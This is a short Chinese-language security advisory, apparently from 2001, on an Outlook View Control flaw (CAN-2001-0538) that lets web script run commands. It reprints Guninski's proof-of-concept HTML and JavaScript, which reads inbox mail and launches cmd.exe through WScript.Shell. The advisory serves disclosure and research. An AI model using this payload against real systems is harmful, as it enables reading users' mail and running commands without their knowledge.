BUGTRAQ ID : 3026
CVE ID :CAN-2001-0538
Microsoft Outlook存在安全漏洞,可能导致攻击者在目标系统上执行任意命令。
这主要是由于一个新的控件“Microsoft Outlook View Control”造成的,它声称自己
“safe for scripting”,但实际上却不是,所以导致了脚本对它的访问。
利用这个漏洞,攻击者可能在用户不知情的情况下利用脚本执行任意命令。
<*来源:Georgi Guninski (guninski@guninski.com)
参考:http://www.guninski.com/vv2xp.html
*>
测试程序:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Georgi Guninski (guninski@guninski.com)提供了如下测试代码:
假设你的收件箱里不止有一封信:
<br>
<object id="o1"
classid="clsid:0006F063-0000-0000-C000-000000000046"
>
<param name="folder" value="Inbox">
</object>
<script>
function f()
{
//alert(o2.object);
sel=o1.object.selection;
vv1=sel.Item(1);
alert("Subject="+vv1.Subject);
alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]");
alert("May be deleted");
//vv1.Delete();
vv2=vv1.Session.Application.CreateObject("WScript.Shell");
alert("Much more fun is possible");
vv2.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /c DIR /A /P /S C:\\ ");
}
setTimeout("f()",2000);
</script>
http://www.20cn.net/ns/ld/win/data/20010714044517.htm
文档发表时间:2001-07-14
------------------
微软给了我窗户,因此UNIX给了我房子
微软给我窗户了吗?没有
所以UNIX没有给了我房子
我仍然游荡在Internet上